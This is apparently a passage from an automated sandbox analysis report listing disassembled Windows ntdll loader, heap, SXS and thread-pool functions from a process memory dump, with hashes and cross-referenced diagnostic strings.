                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                    • API String ID: 0-3223716464
                                                                                                                    • Opcode ID: 0be6aad6c80a49ee2687728f6179c1556efe4edc282129148b021f1622612818
                                                                                                                    • Instruction ID: 03a665fad9a69e20b165d93d1ac73cd7a0a2fc0460be5730c2a66d90d3f897be
                                                                                                                    • Opcode Fuzzy Hash: 0be6aad6c80a49ee2687728f6179c1556efe4edc282129148b021f1622612818
                                                                                                                    • Instruction Fuzzy Hash: A49148B6A01312AFD721EF28DD88B2B7BE8EB94728F05045CFA456F241C7789E05C795
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                    • API String ID: 0-1109411897
                                                                                                                    • Opcode ID: 269432e2872246c739f6487a5949dbc03b11051afb89816fbb99c519f1d94964
                                                                                                                    • Instruction ID: 3890263dccffddc1c59413cd69227ff2de9054163c3ffb7fd08d475915f897d6
                                                                                                                    • Opcode Fuzzy Hash: 269432e2872246c739f6487a5949dbc03b11051afb89816fbb99c519f1d94964
                                                                                                                    • Instruction Fuzzy Hash: 91A24A75A0962A9FDB64CF18C988BADBBB5BF49304F1442D9D90DA7251EB309EC5CF00
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-792281065
                                                                                                                    • Opcode ID: e4bcddd7b61de647131bc575c91f7c19b2d81b49c150a9aba71d268fa9eda1e2
                                                                                                                    • Instruction ID: 818fbd7c7fb9a5473eb2d4b2c0211096082d359999b5ca281a14c32bfb7a17cc
                                                                                                                    • Opcode Fuzzy Hash: e4bcddd7b61de647131bc575c91f7c19b2d81b49c150a9aba71d268fa9eda1e2
                                                                                                                    • Instruction Fuzzy Hash: 4D916A74F01325DBEB35DF6CEA44BAA7BE5BF58B24F140029E9486B282D7709802C791
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A49A01
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A49A11, 01A49A3A
                                                                                                                    • apphelp.dll, xrefs: 019E6496
                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A499ED
                                                                                                                    • LdrpInitShimEngine, xrefs: 01A499F4, 01A49A07, 01A49A30
                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A49A2A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-204845295
                                                                                                                    • Opcode ID: a479b24d9840710f639990cdd86a92c4b718208cd9c799f19c30ceb4fbf3276c
                                                                                                                    • Instruction ID: c5ca4f62bfdc4e4e320e30b678199c5cf4c219b5ed436fb88825c70410f810bc
                                                                                                                    • Opcode Fuzzy Hash: a479b24d9840710f639990cdd86a92c4b718208cd9c799f19c30ceb4fbf3276c
                                                                                                                    • Instruction Fuzzy Hash: 8751DE752083019FEB21DF24D945AAB77E8FFD8A48F00492DF5899B290DA30E905CB93
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 01A68177, 01A681EB
                                                                                                                    • LdrpInitializeProcess, xrefs: 01A2C6C4
                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A681E5
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A2C6C3
                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01A68170
                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01A68181, 01A681F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                    • API String ID: 0-475462383
                                                                                                                    • Opcode ID: fd03207066a75b1900880335346d283d323a218ca6b14c09f32b281de23448d3
                                                                                                                    • Instruction ID: f6f03bf64b6a06af9c0be93eeb185de5afcce55edb2e52c009f6a57a0b89b226
                                                                                                                    • Opcode Fuzzy Hash: fd03207066a75b1900880335346d283d323a218ca6b14c09f32b281de23448d3
                                                                                                                    • Instruction Fuzzy Hash: A23105B16443169BC224EF6CDE46E2B77E8FFD5B20F04055CF984AB295E620ED05C7A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A22674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01A62165
                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A62180
                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A621BF
                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A62178
                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01A62160, 01A6219A, 01A621BA
                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A6219F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                    • API String ID: 0-861424205
                                                                                                                    • Opcode ID: 451f8045bc1173bc1af77c02d1fc8bc941b386c0274e46613c4bfb7716f6e41d
                                                                                                                    • Instruction ID: 80048bdfedd4750c5de82f1ca5c5f2f77e7b3a7b8b4d0566a5f696ed1ff7c674
                                                                                                                    • Opcode Fuzzy Hash: 451f8045bc1173bc1af77c02d1fc8bc941b386c0274e46613c4bfb7716f6e41d
                                                                                                                    • Instruction Fuzzy Hash: 7431C736F44335BBE7259B9A8C81F6A7A78DBA5A54F09405AFB08BB140D2709A00C7E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A3096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 01A32DF0: LdrInitializeThunk.NTDLL ref: 01A32DFA
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30BA3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30BB6
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30D60
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30D74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1404860816-0
                                                                                                                    • Opcode ID: 827872670f4fc42afdc97de39b4e443ea94240d46a91ab9d65c24bb97aa4436a
                                                                                                                    • Instruction ID: 2f6cbd83e6ca3313e6b1a93e6944e2d741320661d017177f085afad92bc1d20e
                                                                                                                    • Opcode Fuzzy Hash: 827872670f4fc42afdc97de39b4e443ea94240d46a91ab9d65c24bb97aa4436a
                                                                                                                    • Instruction Fuzzy Hash: F1426DB2A00715DFDB21CF28C980BAAB7F5FF44314F1445AAE999DB241D770AA85CF60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                    • API String ID: 0-379654539
                                                                                                                    • Opcode ID: 61d452bac3dddc192107cdf95164a7a81aa468959eee8f1e0a0467aa333f73f3
                                                                                                                    • Instruction ID: 2ec01657828a33ee4ce5e02d9e8756c8cc1dee8dc3e9deeefb2dad493ab2dcf8
                                                                                                                    • Opcode Fuzzy Hash: 61d452bac3dddc192107cdf95164a7a81aa468959eee8f1e0a0467aa333f73f3
                                                                                                                    • Instruction Fuzzy Hash: B0C19C74208386EFD711CF58C544B6AB7E4BF84704F04886EFA9D8B291E734CA49CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A28402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • @, xrefs: 01A28591
                                                                                                                    • LdrpInitializeProcess, xrefs: 01A28422
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A28421
                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A2855E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-1918872054
                                                                                                                    • Opcode ID: a20094021a3966e593328e1573a847187340e1022ee117cb5aa6fae1719b7283
                                                                                                                    • Instruction ID: a0391860f32b80daae9df853e86442a87fdc41a5fb5bf875d0f6c38bb2e5305d
                                                                                                                    • Opcode Fuzzy Hash: a20094021a3966e593328e1573a847187340e1022ee117cb5aa6fae1719b7283
                                                                                                                    • Instruction Fuzzy Hash: 7D919E71508355AFE721EF69CD40FABBAECBF84784F44092EFA8496151E334D904CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01A621DE
                                                                                                                    • .Local, xrefs: 01A228D8
                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A622B6
                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A621D9, 01A622B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                    • API String ID: 0-1239276146
                                                                                                                    • Opcode ID: 469f472434d7345c54eef0a61522e80b8a3f50825bbafb9d7b813cc0c5870502
                                                                                                                    • Instruction ID: 47390fa4b60f335d0e16867584055570f46454931df6771bc044ec3b9ba632b2
                                                                                                                    • Opcode Fuzzy Hash: 469f472434d7345c54eef0a61522e80b8a3f50825bbafb9d7b813cc0c5870502
                                                                                                                    • Instruction Fuzzy Hash: D1A1AF31A0022ADFDB25CF68DC88BA9B7B5BF58354F1541EAD948EB251D7709E80CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A24AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A6342A
                                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A63456
                                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A63437
                                                                                                                    • RtlDeactivateActivationContext, xrefs: 01A63425, 01A63432, 01A63451
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                    • API String ID: 0-1245972979
                                                                                                                    • Opcode ID: 69456b4feeb85d6507f4e2ee408b7664b3e902144cac75cad5c27d6cd03553b0
                                                                                                                    • Instruction ID: 6967acc1bdd71e6e0c666fc282a016e7549d3d3a3524553c34ace3bb70b342c8
                                                                                                                    • Opcode Fuzzy Hash: 69456b4feeb85d6507f4e2ee408b7664b3e902144cac75cad5c27d6cd03553b0
                                                                                                                    • Instruction Fuzzy Hash: D66103366007229FDB22CF1DC845B2AF7E5BF84B51F19852DE9599B281C730E802CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A510AE
                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A5106B
                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A51028
                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A50FE5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                    • API String ID: 0-1468400865
                                                                                                                    • Opcode ID: 9aed79fc4990dcbb1a933a09e5dff1004807c93646d787745edf7fe44fedb1f5
                                                                                                                    • Instruction ID: f2f001cf19df3779a77e2a0cbeb61a86d4d3a88ab4032195b80dbd34c1ca96e6
                                                                                                                    • Opcode Fuzzy Hash: 9aed79fc4990dcbb1a933a09e5dff1004807c93646d787745edf7fe44fedb1f5
                                                                                                                    • Instruction Fuzzy Hash: 7171C1B1908305AFDB21DF18C988F9B7FA8AF95764F00046CFA489B246D775D588CBD2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A1245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A5A9A2
                                                                                                                    • apphelp.dll, xrefs: 01A12462
                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A5A992
                                                                                                                    • LdrpDynamicShimModule, xrefs: 01A5A998
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-176724104
                                                                                                                    • Opcode ID: 4e67efe64f6754a1217c83f697f023f84746730de6e159e42efdb053d79ab05b
                                                                                                                    • Instruction ID: 7108ac83f427f3b0af99fb6f8bf9b5b9325bdb359b8455ac3dd20f8eda17bae4
                                                                                                                    • Opcode Fuzzy Hash: 4e67efe64f6754a1217c83f697f023f84746730de6e159e42efdb053d79ab05b
                                                                                                                    • Instruction Fuzzy Hash: 36314A79B40202EBDF32DF5DD845AAA7BF5FF84714F154159E904AB249C7709842C780
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A0327D
                                                                                                                    • HEAP: , xrefs: 01A03264
                                                                                                                    • HEAP[%wZ]: , xrefs: 01A03255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                    • API String ID: 0-617086771
                                                                                                                    • Opcode ID: 793106b9078d6171eb7ee73ff9d53cc3a5e5fc57e69194cad9746a11b45f75e3
                                                                                                                    • Instruction ID: fc20c3d2dbbd5c99fa4c6fc6c33acb6ee4bfdf456f243798e6e9747f805f1124
                                                                                                                    • Opcode Fuzzy Hash: 793106b9078d6171eb7ee73ff9d53cc3a5e5fc57e69194cad9746a11b45f75e3
                                                                                                                    • Instruction Fuzzy Hash: E892DD70A042499FDF26CF68E4447AEBBF1FF48300F18806AE959AB392D735A945CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A00770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-4253913091
                                                                                                                    • Opcode ID: eb2867e324259584fc81c855e1ae6151a9b6415d03cc8fc3b7ce79e0a9f74e1c
                                                                                                                    • Instruction ID: 6ed1aa7e4404ed6ff785dc5e65b5230035cf4a1c29d5c24fc35ed7767744a18c
                                                                                                                    • Opcode Fuzzy Hash: eb2867e324259584fc81c855e1ae6151a9b6415d03cc8fc3b7ce79e0a9f74e1c
                                                                                                                    • Instruction Fuzzy Hash: E7F1AD30A04606DFEB16CF68DA94B6ABBF5FF44344F148168E816DB382D734E981CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A16962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: $@
                                                                                                                    • API String ID: 2994545307-1077428164
                                                                                                                    • Opcode ID: f3943c21e5a9af0ec6c09d0d8ff0d5999e10c45b8a7831aa3bdb99afc8a7b5a3
                                                                                                                    • Instruction ID: 49f46495304b3ffd302a86136c5bac572ae4748f44e396b6c0e74ba73ab1b8d8
                                                                                                                    • Opcode Fuzzy Hash: f3943c21e5a9af0ec6c09d0d8ff0d5999e10c45b8a7831aa3bdb99afc8a7b5a3
                                                                                                                    • Instruction Fuzzy Hash: 27C2B0716083419FDB65CF68C880BABBBE5BF88714F08992DF989C7249D774D805CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                    • API String ID: 0-2779062949
                                                                                                                    • Opcode ID: a765d41a4a81ec2985b5b925b650c71865fb78631cf0a91c61e56f2d3c41fe11
                                                                                                                    • Instruction ID: 86aa739cff8b10fa0fbc068c30ca26751ea8cc63f798813c2115f980f5ac0742
                                                                                                                    • Opcode Fuzzy Hash: a765d41a4a81ec2985b5b925b650c71865fb78631cf0a91c61e56f2d3c41fe11
                                                                                                                    • Instruction Fuzzy Hash: B0A171759116299BDB31DF68CD88BEAB7B8EF88710F1001EAE90CA7250D7359E85CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A10BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 01A5A10F
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A5A121
                                                                                                                    • LdrpCheckModule, xrefs: 01A5A117
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-161242083
                                                                                                                    • Opcode ID: c6bf3a10483e2e91a381445ec4e37353950e0181083c7cc1ec58fe4b6f0069bd
                                                                                                                    • Instruction ID: d8ee6a07fd0229750a036947f113ddf32f3cf41c89ede02f1184f33294cf98b8
                                                                                                                    • Opcode Fuzzy Hash: c6bf3a10483e2e91a381445ec4e37353950e0181083c7cc1ec58fe4b6f0069bd
                                                                                                                    • Instruction Fuzzy Hash: 5471C075A003059FDB25DF68CA80ABEB7F4FB88704F18446DE906DB255E734AD82CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A00A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-1334570610
                                                                                                                    • Opcode ID: 10606b29b5dbf8b05db5e9f3c2e7d323f41b7f8e73aaa59485c460cc417404bd
                                                                                                                    • Instruction ID: 035f0f69c06b2ae3a7b6b747272dc234bf699eb5bdf261ac6be478a264732641
                                                                                                                    • Opcode Fuzzy Hash: 10606b29b5dbf8b05db5e9f3c2e7d323f41b7f8e73aaa59485c460cc417404bd
                                                                                                                    • Instruction Fuzzy Hash: 4161D170A04701DFDB2ACF28D680B6ABBF1FF45754F188569E8598F292C770E881CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A682E8
                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 01A682D7
